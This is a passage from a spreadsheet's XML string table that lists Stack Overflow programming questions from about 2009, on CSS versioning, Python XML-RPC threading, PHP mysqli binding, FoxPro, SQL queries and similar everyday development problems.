    <t xml:space="preserve">&lt;p&gt;If you look at Stackoverflow.com's source you'll see the reference to their css file is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;link href="/Content/all.min.css?v=2383" rel="stylesheet" type="text/css" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How is this done so they can pass a version via query string and have the correct CSS file served up?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running SimpleXMLRPCServer in separate thread and shutting down</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class that I wish to test via SimpleXMLRPCServer in python. The way I have my unit test set up is that I create a new thread, and start SimpleXMLRPCServer in that. Then I run all the test, and finally shut down.&lt;/p&gt;
&lt;p&gt;This is my ServerThread:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ServerThread(Thread):
    running = True
    def run(self):
        self.server = #Creates and starts SimpleXMLRPCServer
        while (self.running):
            self.server.handle_request()
    def stop(self):
        self.running = False
        self.server.server_close()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is, that calling ServerThread.stop(), followed by Thread.stop() and Thread.join() will not cause the thread to stop properly if it's already waiting for a request in handle_request. And since there doesn't seem to be any interrupt or timeout mechanisms here that I can use, I am at a loss for how I can cleanly shut down the server thread.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to do Trim operation to remove space character in a text field in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to do Trim operation to remove space character in a text field in JavaScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Disable/Enable Ribbon Buttons for MFC Feature Pack</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the MFC Feature Pack and I have some buttons on a ribbon bar, instances of CMFCRibbonButton. The problem is that I would like to enable and disable some of them in certain conditions, but at runtime. How can I do this? because there is no specific method for this...I heard that a solution would be to attach/detach the event handlers at runtime, but I do not know how...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF - advantages and disadvantages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to find out about BOTH advantages and disadvantages of Windows Communication Foundation from people who have used it or just know it theoretically.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get an HTML page to read the contents of a text document?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I get an HTML page (.html) to read the contents of a text document that can be found in the same folder as the .html file? The server is IIS.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Crystal Reports hanging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The company has recently implemented software not written by us. The software uses Crystal Reports and whenever somebody draws a particularly large report and close their browser before the report is finished loading, we cannot draw anymore reports. The only way to fix it is to reset iis which is obviously exceptionally bad practice.&lt;/p&gt;
&lt;p&gt;Any ideas on how to overcome this?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse: How to build an executable jar with external jar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to build an executable jar program which depends on external jar downloaded. In my project, I included them in the build path and can be run and debug within eclipse.&lt;/p&gt;
&lt;p&gt;When I tried to export it to a jar, I can run the program but I can't when I try to press a button which includes function calls and classes from the external jar. I have edited the environment variables (Windows XP) CLASSPATH to include paths of all the external jar, but it doesn't work.&lt;/p&gt;
&lt;p&gt;A point to note is that I got compile warnings while exporting my executable jar, but it doesn't show up any description about the warnings.&lt;/p&gt;
&lt;p&gt;Would someone kindly provide a thorough guide on how to include an external jar program using eclipse?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I drag an eMail from Outlook into an Adobe AIR application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a quiestion concerning both, Adobe AIR and MS Outlook.&lt;/p&gt;
&lt;p&gt;I'd like to drag an eMail from Outlook into an AIR application. I want the following data to be transferred into the AIR application:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;unique ID of the mail in Outlook to create a link into Outlook&lt;/li&gt;
&lt;li&gt;rich text of the mail&lt;/li&gt;
&lt;li&gt;some information about the mail like sender, recepient, date etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Some windows applications do this, like &lt;a href="http://www.mylifeorganized.net/" rel="nofollow"&gt;My Life Organized&lt;/a&gt; or &lt;a href="http://www.teamscope.com/otherpro/utilities.asp" rel="nofollow"&gt;Linker&lt;/a&gt;. Is this possible in any way for AIR? I'm pretty sure I need not only the AIR application but also some windows app or Outlook plugin to achieve this. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What function was used to code these passwords in AFX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to work out the format of a password file which is used by a LOGIN DLL of which the source cannot be found. The admin tool was written in AFX, so I hope that it perhaps gives a clue as to the algorithm used to encode the passwords.&lt;/p&gt;
&lt;p&gt;Using the admin tool, we have two passwords that are encoded. The first is "dinosaur123456789" and the hex of the encryption is here:&lt;/p&gt;
&lt;p&gt;The resulting hex values for the dinosaur password are&lt;/p&gt;
&lt;p&gt;00h: 4A 6E 3C 34 29 32 2E 59 51 6B 2B 4E 4F 20 47 75 ; Jn&amp;lt;4)2.YQk+NO Gu
10h: 6A 33 09 ; j3. 
20h: 64 69 6E 6F 73 61 75 72 31 32 33 34 35 36 37 38 ; dinosaur12345678
30h: 39 30 ; 90&lt;/p&gt;
&lt;p&gt;Another password "gertcha" is encoded as 
e8h: 4D 35 4C 46 53 5C 7E ; GROUT M5LFS\~&lt;/p&gt;
&lt;p&gt;I've tried looking for a common XOR, but failed to find anything. The passwords are of the same length in the password file so I assume that these are a reversible encoding (it was of another age!). I'm wondering if the AFX classes may have had a means that would be used for this sort of thing?&lt;/p&gt;
&lt;p&gt;If anyone can work out the encoding, then that would be great!&lt;/p&gt;
&lt;p&gt;Thanks, Matthew&lt;/p&gt;
&lt;p&gt;[edit:]
Okay, first, I'm moving on and going to leave the past behind in the new solution. It would have been nice to use the old data still. Indeed, if someone wants to solve it as a puzzle, then I would still like to be able to use it.&lt;/p&gt;
&lt;p&gt;For those who want to have a go, I got two passwords done.&lt;/p&gt;
&lt;p&gt;All 'a' - a password with 19 a's:
47 7D 47 38 58 57 7C 73 59 2D 50 ; G}G8XW|sY-P
79 68 29 3E 44 52 31 6B 09       ; yh)&gt;DR1k.&lt;/p&gt;
&lt;p&gt;All 'b' - a password with 16 b's.
48 7D 2C 71 78 67 4B 46 49 48 5F ; H},qxgKFIH_
69 7D 39 79 5E 09             ; i}9y^.&lt;/p&gt;
&lt;p&gt;This convinced me that there is no simple solution involved, and that there is some feedback. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>StructureMap InstanceScope.Hybrid and IDisposable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an asp.net-mvc application. The linq data context is being passed into my service objects by structure map. I've got is set to have a scope of hybrid. This all works just fine.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected override void configure()
{
    ForRequestedType&amp;lt;AetherDataContext&amp;gt;()
        .TheDefaultIs(() =&amp;gt; new AetherDataContext())
        .CacheBy(InstanceScope.Hybrid);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that I keep running our of memory, I'm wondering if the IDisposable interface is ever actually being called.&lt;/p&gt;
&lt;p&gt;Anyone got any ideas?&lt;/p&gt;
&lt;p&gt;Failing that anyone got any other idea for things that might be causing my memory exceptions?&lt;/p&gt;
&lt;p&gt;Update:&lt;/p&gt;
&lt;p&gt;So some additional information, I just stuffed a couple of methods into my data context an put brake points in there.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected override void Dispose(bool disposing)
{
    Debug.WriteLine("Disposing: " + DateTime.Now);
    base.Dispose(disposing);
}
public new void Dispose()
{
    Debug.WriteLine("Disposing: " + DateTime.Now);
    base.Dispose();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not quite sure that I'm doing this the correct way, I'm guessing that the new method will be called?&lt;/p&gt;
&lt;p&gt;Anyway, neither of the brake points were hit. However the constructor for the same class was called on every request though. Not ideal I'm thinking.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mysqli binding fields in a prepared statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code, for which I get the error:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Warning&lt;/strong&gt;: mysqli_stmt::bind_result() [mysqli-stmt.bind-result]: Number of bind variables doesn't match number of fields in prepared statement in file.&lt;/p&gt;
&lt;p&gt;If this is only a warning, shouldn't the code still work? I want to do a select * and display all the data except one field, which I want to bind and handle separately. Is there any way around, or a better method? My solution at the moment(untried) is to bind the correct amount of variables to the results with getRecords, and then bind separately as a different name with getHtml.&lt;/p&gt;
&lt;p&gt;What are the advanatges of binding, and is it necessary.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
if (isset($_GET["cmd"]))
  $cmd = $_GET["cmd"]; else
  die("You should have a 'cmd' parameter in your URL");
$id = $_GET["id"];
$con = mysqli_connect("localhost", "user", "password", "db");
if (!$con) {
    echo "Can't connect to MySQL Server. Errorcode: %s\n". mysqli_connect_error();
    exit;
}
$con-&amp;gt;set_charset("utf8");
echo "test outside loop";
if($cmd=="GetSaleData") {
    echo "test inside loop";
    if ($getRecords = $con-&amp;gt;prepare("SELECT SELECT Product_NO, Product_NAME, SUBTITLE, CURRENT_BID, START_PRICE, BID_COUNT, QUANT_TOTAL, QUANT_SOLD, ACCESSSTARTS, ACCESSENDS, ACCESSORIGIN_END, USERNAME, BEST_BIDDER_ID, FINISHED, WATCH, BUYITNOW_PRICE, PIC_URL, PRIVATE_AUCTION, AUCTION_TYPE, ACCESSINSERT_DATE, ACCESSUPDATE_DATE, CAT_DESC, CAT_PATH, COUNTRYCODE, LOCATION, CONDITIONS, REVISED, PAYPAL_ACCEPT, PRE_TERMINATED, SHIPPING_TO, FEE_INSERTION, FEE_FINAL, FEE_LISTING, PIC_XXL, PIC_DIASHOW, PIC_COUNT, ITEM_SITE_ID FROM Sales WHERE Product_NO = ?")) FROM SaleS WHERE PRODUCT_NO = ?")) {
    	$getHtml = $con-&amp;gt;prepare("SELECT PRODUCT_DESC FROM SaleS WHERE PRODUCT_NO = ?");
    	$getHtml-&amp;gt;bind_param("i", $id);
    	$getHtml-&amp;gt;execute();
    	$getHtml-&amp;gt;bind_result($PRODUCT_DESC);
    	$getRecords-&amp;gt;bind_param("i", $id);
    	$getRecords-&amp;gt;execute();
    	$getRecords-&amp;gt;bind_result($PRODUCT_NO, $PRODUCT_NAME, $SUBTITLE, $CURRENT_BID, $START_PRICE, $BID_COUNT, $QUANT_TOTAL, $QUANT_SOLD, $ACCESSSTARTS, $ACCESSENDS, $ACCESSORIGIN_END, $USERNAME, $BEST_BIDDER_ID, $FINISHED, $WATCH, $BUYITNOW_PRICE, $PIC_URL, $PRIVATE_Sale, $Sale_TYPE, $ACCESSINSERT_DATE, $ACCESSUPDATE_DATE, $CAT_DESC, $CAT_PATH, $COUNTRYCODE, $LOCATION, $CONDITIONS, $REVISED, $PAYPAL_ACCEPT, $PRE_TERMINATED, $SHIPPING_TO, $FEE_INSERTION, 
    	$FEE_FINAL, $FEE_LISTING, $PIC_XXL, $PIC_DIASHOW, $PIC_COUNT, $ITEM_SITE_ID);
    	while ($getRecords-&amp;gt;fetch()) {
    		// operations snipped for question
    		echo "&amp;lt;h1&amp;gt;".$PRODUCT_NAME."&amp;lt;/h1&amp;gt;
&amp;lt;div id='leftlayer' class='leftlayer'&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Username: &amp;lt;/strong&amp;gt;".$USERNAME."
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Shipping to: &amp;lt;/strong&amp;gt; ". $country ."
&amp;lt;img src='./images/".$id.".jpg"' width='".$imageSize["width"]."' height='".$imageSize["height"]."'&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;div id='rightlayer'&amp;gt; 
&amp;lt;/div&amp;gt;";
//
} 
}
}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would also like to know what is wrong with my img src statement..., I feel I am mising something elementary such as a slash or quote.&lt;/p&gt;
&lt;p&gt;edit: The code now displays an error after replace * with column names, however the while loop is never entered, and hence no actions are performed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Role security with active directory</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to ensure the security of a asp.net website at work. they ask me to do a role based security with the active directory of my work so i could do a sitemap and give the right acces at the right personne.&lt;/p&gt;
&lt;p&gt;wich class of the framework should i use? make generic identity?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you map an enum as string in fluent nhibernate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to map an enum as a string using Fluent Nhibernate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you build a HttpTraceListener?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My application uses the Trace object to log information. The information is captured in a file with the TextWriterTraceListener and it works perfectly. However, I would like to add another TraceListerner which will record the information to a Web Service. In other words, I need an HttpTraceListener. Moreover, I need something &lt;em&gt;intelligent&lt;/em&gt;, I wouldnâ€™t like to see a HTTP request for every log entry. &lt;/p&gt;
&lt;p&gt;How would you build such thing? I know I have to inherit TraceListener (the documentation is somewhat cryptic...) but &lt;strong&gt;does anybody have an idea if a HttpTraceListener already exist&lt;/strong&gt;? I don't want to reinvent the wheel...&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I return an array from a Visual FoxPro 9 OLEPUBLIC class?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a newbie to FoxPro (but an old-hand at Clipper), I'm a bit at a loss to figure out how to return an array from the following OLEPUBLIC class. &lt;em&gt;edit&lt;/em&gt;: I've modified the code belw to take into consideration the remarks made by @Stuart below. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DEFINE CLASS db AS CUSTOM OLEPUBLIC
	DIMENSION ada(1) &amp;amp;&amp;amp; public scope for later return
	FUNCTION opendb( cpName )
		SET MULTILOCKS ON
		USE (cpName) EXCLUSIVE NOUPDATE
		= CURSORSETPROP("Buffering",5)
		RETURN ALIAS()
	ENDFUNC
	&amp;amp;&amp;amp; etc
	FUNCTION getrecord( sAlias, nRecno )
		SELECT (sAlias)
		GOTO (nRecno)
		fc = FCOUNT()
		DIMENSION this.ada(fc)
		FOR i = 1 TO fc
			STORE CURVAL(FIELD(i)) to THIS.ada(i)
		ENDFOR
		RETURN @THIS.ada
	ENDFUNC
ENDDEFINE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Given the following bit of VBScript, I can open the file fine. What I can't seem to do is get back anything more useful than an error message.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;set sp = createobject("sloop.db")
al = sp.opendb("p:\testing\sloop\patient.dbf")
wscript.echo sp.getrecord(al,1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the error message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;c:\temp\foo.vbs(3, 1) sloop.db sloop.db: .getrecord p:\testing\sloop\sloop.prg Error in line 41 Syntax error. 200&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Line 41, as it turns out, is&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;RETURN @THIS.ada&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;which is really weird as that's the syntax that Microsoft suggests. Any clues?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is the Intellisense for properties and methods of instantiated datacontext not showing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web application project within VS 2008 and I have created a Linq to SQL file onto which I have dragged a table from my data base. The data context is created fine but when I instantiate an object of this type the only item I get showing on the Intellisense for it is the class based on the table I dragged onto the designer and even on this I get no Intellisense if I put a dot after it. Has anyone any idea why I am not seeing all the methods for this datacontext (i.e. SubmitChanges etc).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EmsContentModelDataContext context;
#region Methods
protected void Page_Load(object sender, EventArgs e)
{
    context = new EmsContentModelDataContext();       
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's the best way to get a column name in asp.net using ODBC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a database that has four columns like this&lt;/p&gt;
&lt;p&gt;level_1, level_2, level_3, level_4&lt;/p&gt;
&lt;p&gt;There are also id, name, etc., but only these four are the ones that matter to me at the moment.&lt;/p&gt;
&lt;p&gt;I need to know which column, by columnname, has the value 'BOSS'.&lt;/p&gt;
&lt;p&gt;For example, level_2 may have the value BOSS.  I need to know that one of the four columns has the code BOSS and which column, by column name, it is.&lt;/p&gt;
&lt;p&gt;The reason is that I have to later update this row but I never know where the value BOSS will be.  It could be in level_4, for example.&lt;/p&gt;
&lt;p&gt;I know there is a columnname property in DataSet, but I cannot figure out how to use that here.  I cannot post my code because there are many iterations of it, none of which work.  I am hoping I am overlooking something obvious.&lt;/p&gt;
&lt;p&gt;I am using ASP.NET 2.0 and ODBC.&lt;/p&gt;
&lt;p&gt;Thank you for any ideas.&lt;/p&gt;
&lt;p&gt;just to clarify - I do not need to know how to get the columnname per se.  The columnname property works well for that.  I do not know which column will have the value BOSS above.  Once I can determine that I will get the columnname property value.&lt;/p&gt;
&lt;p&gt;The reason I do not know which column will say BOSS is because there are other values that could be in any of the four so the data entry person has to pick an open field and put in the code - it is an old database application I inherited.&lt;/p&gt;
&lt;p&gt;update:&lt;/p&gt;
&lt;p&gt;Here is what i came up with.  I do not like it but here it is.  It works but it feels wrong:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        String[] myValues = new String[5] {"BOSS", "ANOTHERCODE", "ANOTHERCODE", "ANOTHERCODE", "ANOTHERCODE"};
        int x = 0;
            foreach (String level in myValues)
            {
                foreach (DataColumn dc in ds.Tables[0].Columns)
                {
                    String myColumnValue = ds.Tables[0].Rows[0][x].ToString();
                    if (myColumnValue == level)
                    { return ds.Tables[0].Columns[x].ColumnName; }
                    x += 1;
                }
                x = 0;
            }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I get a list of available NamedCache objects from ScaleOut StateServer (SOSS)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using v4.0.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I've hacked together this so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class AllFilter : IFilter
{
    #region IFilter Members
    IndexCollection IFilter.GetIndexCollection()
    {
        return new IndexCollection();
    }
    MatchOptions IFilter.GetMatchOptions()
    {
        return MatchOptions.MatchAll;
    }
    #endregion
}
public class CacheMonitorController : Controller
{
    public ActionResult Index()
    {
        var results =
            from result in ApplicationNamespace.GlobalNamespace.Query(new AllFilter()).OfType&amp;lt;StateServerKey&amp;gt;()
            group result by result.AppId;
        var b = new StringBuilder();
        foreach (var result in results)
        {
            var cache = CacheFactory.GetCache(result.Key);                
            b.AppendLine(cache.Name);
        }
        return this.Content(b.ToString(), "text/plain");
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Unfortunately, the name of the cache always comes up &lt;code&gt;null&lt;/code&gt;, even though there is certainly a name when the cache is created. The name certainly needs to be identifiable in the UI, so I need a way to get it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the value of a control from the child into the properties of the parent in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a form that has a few similar controls and the parent contains the properties, but the child actually has the html controls.  How could I setup my getters/setters using the "child" controls in the parent class? (Webforms - fyi)&lt;/p&gt;
&lt;p&gt;I found the below via search, and what I'm looking for is the inverse&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/463938/getting-value-of-a-property-in-parent-user-control-from-a-child-user-control"&gt;http://stackoverflow.com/questions/463938/getting-value-of-a-property-in-parent-user-control-from-a-child-user-control&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I should have tried this early on, but instead found it "fun" to explain this crazy situation.  The below is what worked @ 100%&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Get
  Return DirectCast(Page.FindControl("lblCASE_NUMBER"), HtmlContainerControl).InnerHtml
End Get
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>MS SQL 2005 compare field containing square parenthesis</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using MS SQL Server 2005 (9.0.4035) and trying to find rows that contain the same data in a nvarchar(4000) field.  The field contains xml that has both opening and closing square parentheses.&lt;br&gt;&lt;br&gt;
Here is sample data:&lt;br&gt;
    DataID   Data&lt;br&gt;
    1        1&lt;br&gt;
    2        1&lt;br&gt;
    3        2]&lt;br&gt;
    4        2]&lt;br&gt;
    5        3[&lt;br&gt;
    6        3[&lt;br&gt;&lt;/p&gt;
&lt;p&gt;Using the 'like' operator I expected to get 3 matching pairs, but my problem is that row 5 and 6 do not match each other, I only get back that rows 1 &amp;amp; 2 match, and 3 &amp;amp; 4 match.&lt;/p&gt;
&lt;p&gt;I know MS SQL 2005 added regular expression support in queries but I did not expect them to evaluate field data as a regular expression, which I think it is doing.  Is there a mode that I need to enable to get the proper results?&lt;/p&gt;
&lt;p&gt;Any help appreciated,&lt;br&gt;
Ryan&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Edit:&lt;/b&gt; Added sql statement used:&lt;br&gt;&lt;/p&gt;
&lt;p&gt;Select t1.DataID, t2.DataID From TestTable t1, TestTable t2&lt;br&gt;
Where t1.DataID &amp;lt;&gt; t2.DataID&lt;br&gt;
and t1.Data like t2.Data&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Edit:&lt;/b&gt; Answer&lt;br&gt;
Using '=' operator works, but escaping the '[' does not.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How best to update an XML node in MSBuild</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been using the Tigris community tasks to update various AppSettings keys using the XMLUpdate task. &lt;/p&gt;
&lt;p&gt;Now, however I want to add a node to the system.net section to set up the proxy. &lt;/p&gt;
&lt;p&gt;I declared a property&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;PropertyGroup&amp;gt;
    &amp;lt;proxy&amp;gt;&amp;amp;lt;defaultProxy&amp;amp;gt; &amp;amp;lt;proxy usesystemdefault="False" proxyaddress="http://IPADDRESS:PORT" /&amp;amp;gt; &amp;amp;lt;/defaultProxy&amp;amp;gt;&amp;lt;/proxy&amp;gt;
  &amp;lt;/PropertyGroup&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the XMLUpdate Task looks like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;XmlUpdate
 Prefix="n"
 Namespace="http://schemas.microsoft.com/.NetConfiguration/v2.0"
 XmlFileName="$(BuildDir)\Builds\_PublishedWebsites\Presentation\Web.config"
 XPath="/n:configuration/n:system.net"
 Value="$(proxy)"  /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this updates the web config however it updates directly from the property group i.e. doesn't convert the escape characters for the angle brackets. Does anyone have any ideas? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to force process isolation for an out of process COM server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing managed code that has to interact with a vendor's COM automation server that runs out of process.  I have found that this server becomes unstable if more than one client connects to it.  For example, if I have managed code in process A and managed code in process B both connecting to this COM server, a single process will be spun up for the COM server and  it's behavior is less than reliable.  &lt;strong&gt;I'm hoping there's a way to force a separate process for each client - server connection&lt;/strong&gt;.  Ideally, I'd like to end up with:&lt;/p&gt;
&lt;p&gt;Managed Process A talking to COM Server in process &lt;b&gt;C1&lt;/b&gt;&lt;br/&gt;
Managed Process B talking to COM Server in process &lt;b&gt;C2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;One thought that came to mind was that if I ran process A and process B with different security identities, that that might cause the COM infrastructure to create separate server processes.  I'd rather not go down that road, however.  Managed Process A and Managed Process B are actually Windows Services.  And I'm running them with identity Local System (because I need them to be able to interact with the desktop, and you can't check the "Interact with Desktop" box on the services applet for services that don't run as Local System).  And the reason I need to interact with desktop is that this COM server occasionally throws up a dialog box on the screen and if the service itself cannot interact with the desktop then the COM server is spawns can't display the dialog (I believe it is displayed on a hidden WinStation).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generic Database Monitoring Tool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems like something like this &lt;em&gt;should&lt;/em&gt; exist, but I have never heard of it and would find such a utility to be incredibly useful. Many times, I develop applications that have a database backed - SQL Server or Oracle. During development, end users of the app are encouraged to test the site - I can verify this by looking for entries in the database...if there are entries, they have been testing...if not, they haven't.&lt;/p&gt;
&lt;p&gt;What I would like is a tool/utility that would do this checking for me. I would specify the Database and connection parameters and the tool would pool the database periodically (based on values that I specify) and alert me if there was any new activity in the database (perhaps it would pop up a notification in the system tray). I could also specify multiple database scenarios to monitor in the tool. If such an app existed, I wouldn't have to manually run queries against databases for new activity. I'm aware of SQL Profiler, but when I reviewed it, it seemed like overkill for what I wanted to do (and it also wouldn't do the Oracle DB monitoring). Also, to use SQL Profiler, you have to be an admin of the database. I would need to monitor databases where I only have a read-only account.&lt;/p&gt;
&lt;p&gt;Does someone know if such a tool exists?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET 404 (page not found) redirection with original parameters preserved</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm replacing an old web application with a new one, with different structure.&lt;/p&gt;
&lt;p&gt;I can not change the virtual directory path for the new app, as I have users which have bookmarked different links to the old app.&lt;/p&gt;
&lt;p&gt;Lets say I have a user, who has this bookmark:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://server/webapp/oldpage.aspx?data=somedata" rel="nofollow"&gt;http://server/webapp/oldpage.aspx?data=somedata&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My new app is going to reside in the same virtual directory, replacing the old one, but it has no longer oldpage.aspx, instead it has different layout, but it still needs the parameter from the old url.&lt;/p&gt;
&lt;p&gt;So, I have set  to redirect 404 errors to redirectfrombookmark.aspx, where I decide how to process the request.&lt;/p&gt;
&lt;p&gt;The problem is, that the only parameter I receive is "aspxerrorpath=/webapp/oldpage.aspx", but not the "data" parameter, and I need it to correctly process the request.&lt;/p&gt;
&lt;p&gt;Any idea how I can get the full "original" url in the 404 handler?&lt;/p&gt;
&lt;p&gt;EDIT: reading the answers, looks like I did not make the question clear enough:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The users have bookmarked many different pages (oldpage1, oldpage2, etc.) and I should handle them equally.&lt;/li&gt;
&lt;li&gt;The parameters for each old page are almost the same, and I need a specific ones only.&lt;/li&gt;
&lt;li&gt;I want to re-use the "old" virtual directory name for the "new" application.&lt;/li&gt;
&lt;li&gt;The search bots, etc., are not a concern, this is internal application with dynamic content, which expires very often.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The question is - can I do this w/o creating a bunch of empty pages in my "new" application with the old names, and Request.Redirect in their OnLoad. I.e. can this be done using the  404 mechanism, or some event handling in Global.asax, etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaScript Endian Encoding?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/503052/javascript-is-ip-in-one-of-these-subnets/503238#503238"&gt;A response on SO&lt;/a&gt; got me thinking, does JavaScript guarantee a certain endian encoding across OSs and browsers?&lt;/p&gt;
&lt;p&gt;Or put another way are bitwise shifts on integers "safe" in JavaScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle Delete Rows Matching On Multiple Values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DELETE FROM student WHERE
student.course, student.major IN
(SELECT schedule.course, schedule.major FROM schedule)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, it seems that you can only use one column with the IN operator. Is that true? Seems like a query like this should be possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System.Net.Mail.MailMessage questions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am putting some email functionality into one of my asp.net projects:&lt;/p&gt;
&lt;p&gt;I need to send an email to a list of subscribers, list varies from a few dozen to a few hundred subscribers - (down the road there could be thousands).&lt;/p&gt;
&lt;p&gt;When I have a few dozen emails, I do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Mailmsg.Bcc.Add(New System.Net.Mail.MailAddress("asample@gmail.com"))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;for each subscriber, and it works fine. &lt;/p&gt;
&lt;p&gt;What would be a practical limit on the number of email addresses you can add this way before you bogged something down? Also, if you add say 300 email address to a 'To' or 'BCC' field, where does the work happen that splits the single email into seperate emails? at your smtp server? &lt;/p&gt;
&lt;p&gt;What are the pro's and con's of adding dozens or hundreds of addresses to you emails, versus having your code loop thru and send one at a time. Is one method more likely than another to be flagged as spam?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL 2005 Transactional Replication: Behavior during snapshot processing?</t>
  </si>
  <si>
